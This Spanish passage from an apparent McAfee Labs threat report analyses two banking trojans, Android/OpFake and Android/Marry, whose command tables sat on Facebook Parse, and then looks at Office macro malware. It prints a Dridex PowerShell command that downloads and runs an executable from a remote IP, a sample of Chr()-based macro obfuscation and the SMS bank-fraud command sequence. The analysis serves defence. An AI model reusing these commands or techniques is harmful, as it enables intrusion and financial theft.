tabla SmsReceiver
Se guarda la
respuesta
(desde el cuerpo)
en TaskManager
Se consulta
TaskManager
por hash de tarea
Sí
Mensaje SMS
recibido
Se procesa el
mensaje SMS
¿Intercept
activada?
Sí
¿Es una respuesta
a un SMS anterior
enviado?
imei
phone: from
message
type: entrante
Se envían los datos
del mensaje al
canal de inserción
de Parse “I”
Fin
No
No
•
•
•
•
No
¿El origen
contiene
088011
o 000100?
Se envía el mensaje
a /bn/
save_message.php
Sí
Se extrae el saldo
del cuerpo del
mensaje y
se guarda
Interacción entre Android/OpFake y Facebook Parse cuando se recibe un mensaje SMS.
Android/OpFake también comprueba si el SMS es una respuesta a otro SMS
enviado con anterioridad mediante la tabla NewTasks. Si es así, el contenido
se almacena en el campo "response".
Temas principales
Troyano bancario móvil: tablas de Facebook Parse
Con nuestro análisis estático de Android/OpFake descubrimos la finalidad de
los datos almacenados en cada tabla de Facebook Parse:
Tablas de control de Android/OpFake en Facebook Parse
Tabla de Parse
Finalidad
NewTasks
Almacena los nuevos comandos a la espera de que los
ejecute cada dispositivo infectado. Una vez ejecutado
el comando, el registro se borra. El tipo de tareas
y argumentos puede incluir:
■■
■■
Intercept: activación/desactivación y fecha.
■■
New_server: URL y fecha.
■■
SmsReceiver
From: origen del mensaje de texto
(número de teléfono/nombre de la empresa).
■■
Intype: entrante/saliente.
■■
To: ID del dispositivo infectado.
■■
■■
Install: ID del dispositivo, URL que señala
a un archivo APK, nombre del paquete de
la nueva aplicación y fecha.
Contiene todos los mensajes SMS entrantes
interceptados que ha recibido el dispositivo infectado:
■■
TaskManager
SMS: origen (ID del dispositivo infectado),
destino, contenido, fecha.
Is_card: verdadero/falso si el mensaje
contiene un número de tarjeta de crédito.
Type: "service" si el origen es una empresa
(por ejemplo, MegaFon) u "other" si
se trata de otro número de teléfono
(mensaje personal).
Guarda todas las tareas ejecutadas y también su
respuesta si el mensaje SMS entrante es la respuesta
a una tarea ejecutada con anterioridad (como la
solicitud de saldo de una tarjeta de crédito concreta).
En total, durante los dos meses que llevó nuestro estudio encontramos
cinco cuentas afectadas en Facebook Parse, cuatro de ellas utilizadas por
Android/OpFake y una, la cuenta D, utilizada por Android/Marry. En el caso
de NewTasks, el análisis estático demostró que, una vez ejecutada la tarea,
el registro que ejecuta el comando se borra de la tabla. Al analizar la fecha de
creación de los registros de esa tabla, vimos que hasta el 25 de junio no había
casi registros de ejecución de comandos, lo que seguramente significa que en
ese momento los dispositivos infectados habían ejecutado con éxito todos los
comandos creados (o que no se habían creado comandos nuevos). Después
del 25 de junio todas las cuentas contenían varios registros, lo que sugiere
que ninguno se había ejecutado porque los registros no se habían borrado.
Probablemente el malware se había eliminado del dispositivo de la víctima.
Nuestro análisis de la fecha de creación de los registros en la tabla NewTasks
de Facebook Parse indica que el impacto en las víctimas podría haber sido
mayor si los dispositivos infectados hubieran ejecutado todos los comandos
pendientes desde el 25 de junio.
Temas principales
Fechas de creación de registros de ejecución
de comandos de NewTasks
14 000
12 000
10 000
8000
6000
4000
2000
0
13
15
17
19 21 23
Junio 2015
25
27
29
1
Cuenta A (OpFake)
Cuenta B (OpFake)
Cuenta D (Marry)
Cuenta E (OpFake)
3
5
7
9 11
Julio 2015
13
Cuenta C (OpFake)
El comando de NewTasks más utilizado es SMS, ya que se registró 50 000
y 60 000 veces en las cuentas B y E (Android/OpFake), respectivamente.
La cuenta D (Android/Marry) contenía pocos registros, quizá porque la mayoría
de los dispositivos infectados estaban ejecutando tareas activamente en el
momento del análisis:
Tipos de comandos en la tabla NewTasks
70 000
60 000
50 000
40 000
30 000
20 000
10 000
0
Cuenta A
(OpFake)
Cuenta B
(OpFake)
Todos los comandos
SMS
Cuenta C
(OpFake)
Intercept
Cuenta D
(Marry)
New_server
Cuenta E
(OpFake)
Install
Temas principales
Los datos muestran que miles de comandos seguían todavía pendientes de
que los ejecutara Android/OpFake, mientras que Android/Marry logró procesar
la mayoría de las tareas. Las cifras también muestran que el objetivo principal
de estas dos familias de malware es enviar mensajes SMS para realizar fraudes
financieros, como se deduce de los datos obtenidos en la tabla TaskManager.
En la tabla NewTasks vimos varios ejemplos de entrega con comandos distintos
de SMS e Install:
■■
New_server:
––hxxp://newwelcome00.ru
––hxxp://newelcome00.ru
■■
Install:
––Android/OpFake entrega Android/Marry:
■■
■■
hxxp://newwelcome00.ru/appru.apk (marry.adobe.net.
threadsync).
hxxp://newwelcome00.ru/app.apk (marry.adobe.net.nightbuid).
––hxxp://notingen.ru/Player.apk (com.adobe.net)
––hxxp://швждаыдлпждв
En la tabla SmsReceiver, la cuenta E (Android/OpFake) fue la más activa, ya que
interceptó y robó unos 60 000 mensajes SMS entrantes, seguida de la cuenta B
con aproximadamente 41 000 registros:
Número de mensajes en la tabla SmsReceiver
70 000
60 000
50 000
40 000
30 000
20 000
10 000
0
Cuenta E
(OpFake)
Cuenta B
(OpFake)
Cuenta A
(OpFake)
Cuenta C
(OpFake)
Cuenta D
(Marry)
Los datos muestran que Android/OpFake reunió casi 170 000 mensajes
SMS de dispositivos infectados, la mayoría de ellos mensajes personales,
porque, como hemos visto antes, las tareas recientes de la tabla NewTasks
no se habían podido ejecutar. Esto demuestra que las víctimas no solo se
vieron afectadas económicamente, sino que los ciberdelincuentes también
invadieron su privacidad.
Temas principales
Al comprobar el campo is_card de la tabla SmsReceiver, descubrimos la cantidad
de números de tarjetas de crédito robados con mensajes SMS entrantes durante
los dos meses del estudio:
Cantidad de números de tarjetas de crédito robados
(durante el período de estudio de dos meses)
140
120
100
80
60
40
20
0
Cuenta D
(Marry)
Cuenta E
(OpFake)
Cuenta B
(OpFake)
Cuenta A
(OpFake)
Cuenta C
(OpFake)
En cuanto a las fechas en las que se interceptaron los mensajes SMS, todas
las cuentas registraron su máxima actividad entre el 16 y el 24 de junio:
Fechas de creación de registros de ejecución
de comandos SmsReceiver
16 000
14 000
12 000
10 000
8000
6000
4000
2000
0
8
10 12 14 16 18 20 22 24 26 28 30
Junio 2015
Cuenta A (OpFake)
Cuenta B (OpFake)
Cuenta D (Marry)
Cuenta E (OpFake)
2
4
6
8 10 12 14 16
Julio 2015
Cuenta C (OpFake)
Temas principales
En la tabla TaskManager, que contiene las tareas ejecutadas y la respuesta
correspondiente (de haberla), la cuenta D (Android/Marry) fue de lejos la de
mayor éxito en la ejecución de tareas:
Tipos de comandos en la tabla TaskManager
21 000
18 000
15 000
12 000
9000
6000
3000
0
Cuenta A
(OpFake)
Solicitudes
Cuenta B
(OpFake)
Respuestas
Cuenta C
(OpFake)
SMS
Cuenta D
(Marry)
Intercept
Cuenta E
(OpFake)
Install
Combinado con los datos hallados en NewTasks, el gráfico anterior confirma que
Android/Marry estaba muy activo en el momento en que accedimos a las cuentas
afectadas y que se ejecutaron con éxito más de 20 000 comandos, la mayoría de
ellos tareas SMS principalmente orientadas al fraude financiero.
Siendo Android/Marry la familia de malware que logró ejecutar el mayor número
de tareas (debido al número de registros de la tabla TaskManager), concentramos
nuestro análisis en los comandos ejecutados de la cuenta D y sus respuestas.
Al examinar el destino de las tareas SMS, identificamos las empresas que
Android/Marry atacó con más frecuencia (cuenta D):
Temas principales
Número de solicitudes por SMS por compañía atacada
5500
5000
4500
4000
3500
3000
2500
2000
1500
1000
500
0
Banco 5335
Banco 100
Banco 79037672265
Banco 159
Banco 3116
Banco 7878
Banco 6996
Banco 7494
Banco 10060
Banco 900
En el caso de un importante banco de Europa oriental, se enviaron 5350 mensajes
SMS al número 900 de la organización. Los mensajes SMS realizaron estas
transacciones financieras:
Temas principales
Comandos hallados en la tabla TaskManager
Comando
Formato
Respuesta
BALANCE/
BALANS/баланс
(Saldo)
BALANS <4-últimosdígitos>
VISA1234 Balance:
<importe>
INFO/СПРАВКА
(Información)
СПРАВКА
Lista de tarjetas
conectadas:
VISA1234(ON);
ПЕРЕВОД/
PEREVOD/
ПЕРЕВЕСТИ
(Transferir)
ПЕРЕВОД <4dígitos_
origen_tarjeta>
<4dígitos_destino_
tarjeta> o <número_
teléfono_destino>
<importe>
Para transferir <importe>
de la tarjeta VISA1234,
el titular <nombre>
debe enviar el código
<código> al número 900.
ZAPROS
(Solicitar)
ZAPROS <número_
teléfono> <importe>
Se ha enviado la solicitud
de una transferencia de
<importe> a su tarjeta
VISA5678. El dinero se
abonará en su cuenta
tras la confirmación del
ordenante <nombre>.
TEL/PLATEZ/
PHONE/
POPOLNI/PLATI
(Cuenta de pago
del móvil)
TEL <número_teléfono>
<importe>
Para pagar con la tarjeta
VISA1234 el importe
<importe> del teléfono
<número_teléfono>
de <empresa>, envíe
el código <código> al
número 900.
Normalmente, la transacción financiera fraudulenta comienza cuando se envía
INFO al número 900 (mediante la tabla NewTasks) para obtener una lista
de tarjetas conectadas. Si se obtiene una respuesta y la víctima tiene una
o varias tarjetas de crédito activadas para transacciones por SMS (por ejemplo,
VISA1234 (ON)), el ciberdelincuente comprueba el saldo de cada tarjeta. Si hay
dinero disponible, se inicia una transacción fraudulenta para transferir dinero a otra
tarjeta o cliente o para pagar una cuenta de telefonía móvil creando un registro en
NewTasks con destino 900 y las palabras Transferir (en ruso) o TEL/PLATI.
Como medida de seguridad, el banco responde con un código que el usuario
debe enviar para confirmar la transacción. El ciberdelincuente comprueba
la tabla TaskManager para obtener el código y crea en NewTasks un nuevo
registro de ejecución de comando para enviar el código de confirmación al
número 900. En el caso de ZAPROS (Solicitar), el ciberdelincuente solicita
la transferencia de un importe a un número de teléfono que puede ser otro
dispositivo infectado. Si la otra víctima confirma la transacción, el dinero
se transfiere al ciberdelincuente. Como la solicitud BALANCE se realiza por
cada tarjeta de crédito, fue sin duda la solicitud más frecuente durante los
dos meses del estudio.
Temas principales
Números de solicitudes por comando de banca
5000
4000
3000
2000
1000
0
BALANCE/
BALANS/
/баланс
(Saldo)
INFO/
СПРАВКА
(Información)
ПЕРЕВОД/
PEREVOD/
ПЕРЕВЕСТИ
(Transferencia)
ZAPROS
(Solicitud)
TEL/PLATEZ/
PHONE/
POPOLNI/PLATI
(Cuenta de pago
del móvil)
Estos son los tipos de respuestas del banco afectado que encontramos en la
cuenta D:
Respuestas enviadas por el banco afectado halladas en la
tabla TaskManager
Tipo
Respuesta
Saldo
Saldo VISA1234: <importe>
Información
Lista de tarjetas conectadas: VISA1234(ON);
Teléfono
solicitado
Para pagar con la tarjeta VISA1234 el importe
<importe> del teléfono <número_teléfono> de
<empresa>, envíe el código <código> al número 900.
Teléfono
procesado
Pago el <fecha> <hora> con VISA1234 por <importe>
por los servicios de <operador> <número_teléfono>.
Saldo: <importe>
Transferencia
procesada
MAES1234: Se ha procesado la transferencia de
<importe> al titular de la tarjeta <nombre>
Transferencia
aceptada
VISA1234: <hora> Se ha recibido el importe <importe>
del ordenante <nombre>. Saldo: <importe>
Transferencia
solicitada
Para transferir el importe <importe> de la tarjeta
VISA1234, el titular de la tarjeta <nombre> debe enviar
el código <código> al número 900.
Temas principales
Vamos a agrupar el tipo de respuestas por categoría:
■■
■■
■■
Saldo/Información: contiene información general, como las tarjetas
de crédito vinculadas a una cuenta bancaria, cuáles están activas y su
saldo actual.
Transferencia solicitada: las respuestas incluyen códigos de confirmación
que el usuario debe enviar para finalizar las transacciones.
Transferencia procesada: contiene las transacciones
fraudulentas confirmadas.
Número de respuestas de bancos atacados encontradas
en la tabla TaskManager
700
600
500
400
300
200
100
0
Saldo
Información
Teléfono
solicitado
Teléfono
procesado
Transferencia Transferencia Transferencia
procesada
aceptada
solicitada
Aquí también Saldo es la respuesta más frecuente, ya que se obtuvo con éxito
el saldo de 607 tarjetas de crédito, seguida de Información, que proporciona la
lista de tarjetas de crédito conectadas pertenecientes a 123 cuentas bancarias.
En total, durante junio y julio se realizaron 141 transacciones fraudulentas
(Pagar teléfono y Transferir).
Temas principales
Número de usuarios afectados por troyanos bancarios móviles
Como cada registro tiene un identificador de dispositivo único (IMEI o android_id),
pudimos hacer el recuento del número de víctimas afectadas por tabla y por
cuenta. Observamos que, a juzgar por la cifra de identificadores de dispositivo
únicos de la tabla TaskManager (tareas ejecutadas), el número de usuarios
afectados podía haber sido mucho mayor que el real si los dispositivos infectados
hubieran ejecutado el contenido de la tabla NewTasks. Por otro lado, vimos que
Android/OpFake (cuentas A, B, C y E) fue más eficaz interceptando mensajes SMS,
mientras que Android/Marry afectó a más usuarios realizando transacciones
fraudulentas a través de mensajes SMS. Durante los dos meses de datos que
analizamos, estos dos troyanos bancarios móviles afectaron a miles de usuarios,
la mayoría situados en Europa oriental.
Número de usuarios afectados por tabla
9000
8000
7000
6000
5000
4000
3000
2000
1000
0
Cuenta A
(OpFake)
Cuenta B
(OpFake)
NewTasks
SmsReceiver
Cuenta C
(OpFake)
Cuenta D
(Marry)
Cuenta E
(OpFake)
TaskManager
Divulgación responsable
El 3 de agosto, Rasthofer y Bodden notificaron estos resultados a Facebook.
El 6 de agosto, Facebook bloqueó todas las cuentas de Facebook Parse
afectadas que habían utilizado estos dos troyanos bancarios móviles.
Este estudio demuestra que los troyanos bancarios móviles son una amenaza
real que afecta a miles de usuarios y a numerosas empresas, especialmente en
Europa oriental, donde el fraude financiero con mensajes SMS es muy activo
mediante aplicaciones móviles maliciosas.
Temas principales
Nuestro análisis también indica que las transacciones fraudulentas afectaron
a cientos de usuarios durante los dos meses del estudio. Finalmente, demuestra
que los creadores de malware actúan como cualquier desarrollador legítimo, en
el sentido de que a menudo se centran en la funcionalidad de la aplicación y no
en la seguridad de los datos que recopila o utiliza el malware. Si los agresores
hubieran codificado el malware con prácticas de seguridad sólidas, este análisis
no habría sido posible.
Protección
En el caso de las aplicaciones móviles legítimas, para los usuarios es difícil
saber si estas utilizan servicios BaaS y, en tal caso, si se han implementado
correctamente las directrices de seguridad para BaaS. Para reducir la exposición
de los datos personales en soluciones BaaS, McAfee Labs recomienda que
los usuarios se limiten a utilizar aplicaciones móviles bien conocidas cuya
seguridad haya validado un tercero de confianza.
En el caso de los troyanos bancarios móviles, como hemos visto en los datos
obtenidos de las cuentas de Facebook Parse afectadas, los dispositivos
infectados se emplean para distribuir malware con ataques de phishing que
envían mensajes SMS con el texto "Tiene 1 mensaje no leído". Intel Security
recomienda descargar aplicaciones móviles únicamente en tiendas reconocidas
como Google Play y evitar las que proceden de fuentes desconocidas, incluidos
los mensajes SMS y de correo electrónico. También recomienda que los usuarios
de dispositivos móviles se abstengan de obtener acceso root en sus dispositivos
(o, si es preciso, que lo hagan después de las tareas que requieran privilegios
de administrador), porque el malware móvil a menudo aprovecha el acceso
privilegiado para instalar aplicaciones inadvertidamente sin el consentimiento
del usuario. Por último, para proteger los dispositivos frente a estas amenazas,
recomendamos instalar una solución de seguridad móvil.
Temas principales
—Diwakar Dinkar y Rakesh Sharma
¿Recuerda el malware basado en macros? En la década de los 90, hasta que
Microsoft tomó las medidas necesarias para reducir su eficacia, había amenazas
como Melissa y WM.Concept que conseguían sus objetivos. Ahora, tras varios
años de decadencia, se observa un repunte de las macros maliciosas.
Aunque los usuarios particulares no se ven muy afectados por esta amenaza,
ya que hacen un uso mínimo de las macros, las organizaciones de mayor tamaño
sí las emplean con frecuencia, ya que son programas fáciles de desarrollar
y útiles para las tareas repetitivas. Los desarrolladores de malware basado
en macros emplean técnicas de ingeniería social para que los usuarios de
empresas desprevenidos caigan en la trampa.
Cómo funcionan las macros
Una macro es un método rápido para automatizar una tarea que se realiza
con frecuencia. Se trata de código incrustado en un documento que, en el
caso de los archivos Microsoft Office, normalmente se escribe en el lenguaje
de programación Visual Basic para aplicaciones. Grabar una macro es escribir
un programa mediante el empleo de un potente lenguaje de programación.
Una macro se puede ejecutar automáticamente cuando el usuario realiza una
operación, como iniciar Microsoft Word o abrir un documento. Word reconoce
los siguientes nombres como macros automáticas o macros "auto":
■■
AutoExec: se inicia cuando se carga Word o la plantilla global.
■■
AutoNew: se inicia cuando el usuario crea un nuevo documento.
■■
AutoOpen: se inicia cuando el usuario abre un documento.
■■
AutoClose: se inicia cuando el usuario cierra un documento.
■■
AutoExit: se inicia cuando se cierra Word o la plantilla global.
Las macros permiten al usuario ahorrar tiempo en tareas sencillas, sin
embargo los autores de malware pueden escribir código malicioso en su
interior. El malware basado en macros afecta a cualquier producto que
permita a los usuarios escribir secuencias de comandos de macro.
Debido a su popularidad, el producto con más malware para macros es Microsoft
Word. El malware se propaga fácilmente a través de los documentos Word,
ya que estos contienen texto y macros. Esta combinación de texto y macros
mejora el control y ofrece más comodidad al usuario, pero al mismo tiempo abre
la puerta al malware basado en macros. Las mismas ventajas y riesgos se aplican
a los archivos Excel, en los que los datos y las macros asociadas se encuentran en
el mismo libro de trabajo.
Cuando Microsoft reconoció el alcance de la amenaza, cambió la configuración
predeterminada de Office de manera que no permitiera la ejecución de macros,
y de esta forma proteger a la mayoría de los usuarios. Pero muchas de las
grandes empresas sí utilizan macros y, por lo tanto, dejan la puerta abierta.
Los autores de malware han aprovechado esta oportunidad, y el malware para
macros ha vuelto mediante el empleo de sencillos trucos de ingeniería social.
Temas principales
Una breve historia del malware basado en macros
En los años 90, el malware para macros, como los virus WM.Concept y Melissa,
infectó a millones de usuarios de Microsoft Office.
■■
■■
WM.Concept: el primer virus de macro que se propagaba a través de
Word apareció en 1995. Era la primera vez que los virus podían residir
en documentos de procesamiento de texto y hojas de cálculo comunes.
Melissa: este virus de macro de envío masivo fue descubierto por McAfee
Labs en 1999. Melissa se propaga a través de un documento Word como
archivo adjunto del correo electrónico con un breve texto que indica a los
usuarios que abran y lean el adjunto. Al abrir el documento Word, se
ejecuta el virus. Melissa comprueba si están instalados Word 97 o 2000.
Desactiva algunas funciones del software, como el aviso de ejecución
de una macro la próxima vez que se abra el documento en Word 2000.
Infecta otros documentos Word 97 y Word 2000 mediante la adición de
una nueva macro denominada Melissa. Se propaga mediante el envío
de copias del documento infectado hasta a 50 direcciones de correo
electrónico, utilizando versiones compatibles de Outlook. Si el equipo
infectado no tiene Outlook o una conexión a Internet, el virus sigue
propagándose localmente. Se cree que este virus ha infectado hasta
a un 20 % de los ordenadores del mundo y ha sido el de más rápida
propagación hasta el momento.
Para luchar contra el malware basado en macros, Microsoft generó un paso
que requería permisos para activar las macros y que servía como verificación.
Ahora Microsoft Office desactiva todas las macros de manera predeterminada,
de forma que no es posible ejecutar macros sin el permiso del usuario.
Esta iniciativa aplacó el entusiasmo de los desarrolladores de malware
basado en macros y redujo la influencia de las macros maliciosas.
Vuelve el malware basado en macros
A pesar de las mejoras aportadas por Microsoft, en el último año hemos
observado el empleo de malware basado en macros para atacar empresas
mediante amenazas persistentes. Durante los últimos trimestres el enorme
incremento de este tipo de malware pone de manifiesto que los programas
de Office vuelven a ser los objetivos más populares.
Nuevo malware basado en macros
45 000
Las amenazas basadas en macros
para Office están en su nivel
máximo en seis años.
40 000
35 000
30 000
25 000
20 000
15 000
10 000
5000
0
T4
2013
T1
T2
2014
T3
T4
T1
T2
2015
T3
El enorme repunte de las muestras enviadas a McAfee Labs demuestra que el malware
basado en macros vuelve a aumentar.
Temas principales
Ataques de malware basado en macros por región
1 %1 %
Norteamérica
12 %
Europa
Asia
13 %
44 %
América Central
Oceanía
29 %
África
América del Sur
Los ataques de malware basados en macros son más prevalentes en Norteamérica,
seguidos por el norte de Europa.
Cadena de infección
El malware basado en macros se propaga principalmente a través de adjuntos
de correo spam: mediante el empleo de distintas campañas de spam, páginas
web atacadas y descargas secundarias. El mecanismo de distribución ha
evolucionado: al principio, las campañas de spam duraban días y semanas,
y utilizaban el mismo asunto de correo electrónico o nombre de adjunto.
Este uso sistemático ayudaba a los proveedores de seguridad a detectar y mitigar
rápidamente las amenazas. Sin embargo, ahora las campañas de spam basado en
macros tienen poca duración, los asuntos cambian con frecuencia y los archivos
adjuntos han sido diseñados metódicamente con el fin de evitar la detección.
Además, las infecciones actuales no suelen ser detectadas, ya que el archivo se
comporta como un documento normal, incluso tras realizar su actividad maliciosa.
El malware basado en macros en general sirve como punto de entrada para
otro malware que consigue llegar al sistema de la víctima y provocar más daños.
El diagrama siguiente muestra la cadena de infección típica del malware de macros
desde el momento del contacto inicial hasta que deja su carga útil maliciosa.
Temas principales
Cadena de infección de malware basado en macros
El spam contiene
un documento de Office
con una macro
El usuario activa
y ejecuta la macro
El malware descarga
más malware del servidor
de control
Esta cadena de infección comienza con el mensaje de spam que lleva adjunto
el archivo .doc o .zip. El contenido del correo electrónico está adaptado
para que resulte atractivo a los usuarios mediante el empleo de técnicas
de ingeniería social. Entre las líneas empleadas como asunto del correo
electrónico se incluyen algunas como las siguientes, por ejemplo:
■■
Solicitud de pago
■■
Aviso importante sobre transferencia internacional rechazada
■■
Fax-54078429-248035834
■■
Notificación del servicio de mensajería
■■
Curriculum Vitae
■■
Solicitud de pago de 4478,63
■■
Factura de Help Desk US
■■
Factura de ventas
■■
Confirmación de donación
■■
Factura alias Hello
Si se emplea una línea de asunto eficaz, los usuarios más incautos leerán
el mensaje y abrirán el archivo adjunto.
Temas principales
Ejemplos de mensajes que contienen adjuntos maliciosos.
Cada vez que un usuario abre un archivo Word malicioso, se muestra un aviso
de seguridad que le pregunta si desea activar las macros. Una vez activadas,
se ejecuta la macro que contiene el malware. El contenido de los archivos
Word maliciosos varía según la familia de amenazas. El usuario puede ver un
documento vacío o bien un mensaje que solicita activar las macros para ver el
contenido del documento. En algunos casos, el malware elimina el contenido
del documento una vez que la macro se ha activado.
Temas principales
Ejemplos de archivos Word maliciosos.
Al activar las macros para abrir un documento malicioso, el usuario permite
la ejecución del malware. Tras ejecutar las macros, el malware copia uno
o varios archivos .bat, .vbs o .ps (PowerShell) en el sistema de la víctima,
según si la familia de malware es Bartallex, Dridex, Donoff u otro downloader.
Estos archivos descargarán a su vez otro malware, como Upatre, Vawtrak,
Chanitor o Zbot. McAfee Labs ha observado últimamente macros que
descargan amenazas para sistemas de puntos de venta y ransomware.
Ocultación del malware basado en macros
En nuestro análisis hemos descubierto mucho código basura en las secuencias
de comandos de las macros, así como API falsas en los ejecutables. El objetivo
del código basura es evitar que funcionen las técnicas de ingeniería inversa
y detección. Se insertan líneas de código varias veces para complicar las
investigaciones y ocultar la intención maliciosa.
Temas principales
Los desarrolladores de malware para macros añaden código basura para intentar complicar
la ingeniería inversa.
Este tipo de ocultación de código es eficaz. Hemos observado muchos casos en
los que no solo se incluían cadenas maliciosas, sino también datos basura con el
objeto de crear confusión. Los agresores suelen ocultar el código de las macros
mediante el empleo de funciones irrelevantes que van desde conversores de
caracteres, como Chr() y ChrW(), hasta las de cifrado complejo personalizado.
Este ejemplo muestra cómo se utiliza una función de conversión de caracteres para
reconstruir la URL maliciosa con el fin de descargar la carga útil final.
Temas principales
Ejecución de macros
Un documento malicioso puede comenzar con la macro Auto_Open(), que se
ejecuta automáticamente cada vez que se abre el documento. A continuación,
Auto_Open() invoca el método principal. Las macros también puede
contener controladores de eventos de Microsoft Office, como AutoOpen()
y Workbook_Open(). Estos controladores invocarán Auto_Open(), que a su
vez activará el método principal que descarga la carga útil en el sistema de la
víctima. Gracias a la aplicación de las tres macros —Auto_Open(), AutoOpen()
y Workbook_Open()— en un documento, los agresores reducen el riesgo de
fallo de la ejecución maliciosa.
Func AutoOpen()
Auto_Open
End Func
Func Workbook_Open
Auto_Open
End Func
Func Auto_Open()
Main_Func
End Func
Func Main_Func()
Descifrar la URL
Descifrar la ruta del archivo
End Func
Func Download (URL, PATH)
Descargar la carga útil final
End Func
Los agresores suelen utilizar macros redundantes para garantizar que funcionen.
Cuando se ejecuta el malware malicioso, se crea un objeto XMLHTTP para
intercambiar datos con el servidor. Este envía de manera continua una solicitud
de conexión al servidor utilizando HTTP Send() hasta que obtiene una respuesta.
Una vez que se establece la conexión con la URL descifrada, se descarga la
carga útil final y se guarda en la ruta especificada en el sistema de la víctima.
Por último, se ejecuta el binario descargado mediante un comando Shell().
Temas principales
Instancia de objeto
XMLHTTP creada
Preparación de cuerpo
de solicitud HTTP
Send()
No
readyState==4?
Sí
Variable=
Respuesta
(archivo
cargado)
Guardar
contenido en
ubicación
especificada
Ejecutar
archivo
cargado
con Shell()
Este organigrama muestra la rutina de distribución de la carga útil del malware.
Comportamiento de Bartallex
Vamos a examinar el comportamiento de Bartallex, que contiene tres macros
maliciosas incrustadas.
Detalles de la extracción de macros en Bartallex.
Las dos primeras líneas utilizan métodos de ocultación clásicos.
■■
■■
BART212 = "" & "d-up" + "date"
BART2 = Chr(97) + Chr(100) & "" & "o" & "" & "b" & "e" + "ac" &
BART212
Es habitual dividir una variable para evitar ser detectado por los analizadores
que buscan palabras clave y otras actividades sospechosas, como descargas de
archivos. La función Chr devuelve una cadena que contiene el carácter asociado
al código de carácter especificado. Por ejemplo, Chr(97) es la letra a y Chr(100)
es la letra d.
Temas principales
Tras eliminar los espacios y realizar las sustituciones correspondientes,
obtenemos una cadena con sentido:
BART2 = "adobeacd-update".
Otra variante de Bartallex emplea otro mecanismo de ocultación diferente para burlar
a los investigadores de seguridad.
Al abrir el archivo del documento con las macros activadas, se ejecuta el archivo
de proceso por lotes copiado, que a su vez ejecuta el archivo .vbs, que descarga
inmediatamente otro malware —como Upatre, Vawtrak y Chanitor— del servidor
remoto. (Aquí encontrará más información sobre Bartallex).
Malware que se conecta al servidor de control http:/xx.xxx.254.213 para descargar la carga
útil, que parece ser un archivo .jpg pero en realidad es un archivo ejecutable malicioso.
Temas principales
Comportamiento de Dridex
En el caso de Dridex, el documento adjunto puede llegar en una de esta
dos variantes:
■■
La primera llega como un documento XML (.xml o .doc) que contiene
un objeto de Office cifrado mediante Base64, que se descifra
y ejecuta al abrir el archivo XML. El objeto ActiveMime incrustado
contiene un documento OLE cifrado que se descifra y ejecuta
justo después de que el archivo XML abra el objeto de Office.
A continuación, el archivo OLE ejecuta una macro incrustada que
contiene código similar al que vemos en la siguiente imagen:
Este código ejecuta PowerShell y descarga Dridex.
■■
La segunda variante llega como archivo Word o Excel que contiene un
objeto activo de Office que ejecuta el código malicioso en el archivo
OLE como código OLE nativo.
Los autores de malware basado en macros saben bien lo que hacen; incluso
aunque el usuario no haya activado la ejecución de las macros, el malware puede
ejecutarse lanzando el código malicioso directamente desde el archivo OLE.
Para engañar al usuario, el malware presenta un archivo de documento con
un objeto activo incrustado.
Temas principales
Los usuarios reciben una advertencia sobre la apertura de objetos activos maliciosos,
parecida a la que aparece cuando intentan abrir un documento que contiene una
macro incrustada.
Si está desprevenido, el usuario puede abrir el objeto activo incrustado ignorando
la advertencia y hacer doble clic en el objeto malicioso. En este caso, el código de
descarga (downloader) se procesará mediante la ejecución de una instancia de
PowerShell, como en la variante anterior.
En cualquiera de los casos, el código malicioso incrustado ejecutará una instrucción
de línea de comandos que iniciará powershell.exe con los siguientes parámetros:
■■
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (NewObject System.Net.WebClient).DownloadFile('hxxp:// 62.xx.xx.15 /
asalt/assa.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\
JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\
JIOiodfhioIH.exe;
Temas principales
El código anterior solo se ejecutará si PowerShell está instalado. Tras ejecutar
este código, el malware descarga y ejecuta el cargador Dridex, que descarga
e instala la DLL de Dridex, que se inyecta en explorer.exe mediante la ejecución
del siguiente comando:
■■
rundll32.exe "C:\XX.tmp" NotifierInit
Tras ejecutar este comando, se instala en el sistema el propio Dridex, se termina
rundll.exe y el sistema queda infectado. A continuación, el malware se pone en
contacto con el servidor, o los servidores, de control para comunicar la infección.
Dridex es un malware "bancario" que puede robar credenciales de usuario para
las cuentas online; procede de Cridex. Los dos forman parte de la familia de
malware GameOver Zeus. (Aquí encontrará más información sobre Dridex).
Hace poco, McAfee ha observado también ataques basados en macros que
propagan el malware de punto de venta Evoltin, que roba el nombre del PC,
la GUID y otros datos relacionados, y los transmite a través de HTTP Post al
servidor remoto. (Aquí encontrará más información sobre Evoltin).
Conclusión
Aunque el uso de las macros para distribuir malware no es una novedad, las
macros actuales son más eficaces y flexibles, gracias al empleo de funciones
como PowerShell. Ya hace tiempo que los autores de malware emplean las
macros debido a su simplicidad, facilidad de codificación y otras ventajas para
atacar a las víctimas y propagar el malware. Los autores de malware utilizan
técnicas de ingeniería social para infectar a un gran número de usuarios.
Generalmente, no es necesario activar las macros para ver el contenido de
un documento. Si recibe un documento de este tipo, tenga cuidado. Es fácil
escapar a estos engaños si se conoce la amenaza.
Prevención
La medida más importante para proteger a los usuarios contra el malware
basado en macros es mantenerles al corriente del problema y de los medios de
propagación. La formación de los usuarios ayuda a fomentar la concienciación
sobre el problema.
Hay algunas otras medidas que usuarios y empresas pueden tomar para
protegerse y evitar convertirse en víctimas. Es necesario tener en cuenta el
nivel de seguridad que requiere cada aplicación. Por ejemplo, es improbable
que PowerPoint utilice macros, por lo tanto sus usuarios pueden desactivar
esta función. Los servidores de correo electrónico y los analizadores de virus
se pueden configurar para que filtren el tráfico del correo con el fin de localizar
adjuntos que contengan macros y, por ejemplo, muestren un mensaje de
advertencia al destinatario.
Temas principales
McAfee Labs recomienda las siguientes medidas para luchar contra los ataques
de malware basados en macros:
Descubra cómo puede
protegerle Intel Security
frente a esta amenaza.
■■
■■
■■
■■
■■
■■
■■
■■
■■
■■
■■
Active las actualizaciones automáticas de los sistemas operativos
o descargue con regularidad las actualizaciones para que estos
cuenten con los parches necesarios para estar protegidos frente
a las vulnerabilidades conocidas.
Configure el software antimalware para que analice automáticamente
los archivos adjuntos de todos los mensajes instantáneos y de correo
electrónico. Asegúrese de que los programas de correo electrónico
no abran automáticamente los archivos adjuntos ni procesen
automáticamente los gráficos, así como de que el panel de vista
previa esté desactivado.
Establezca la configuración de seguridad del navegador como
mínimo al nivel medio.
Preste especial atención al abrir adjuntos, sobre todo si tienen la
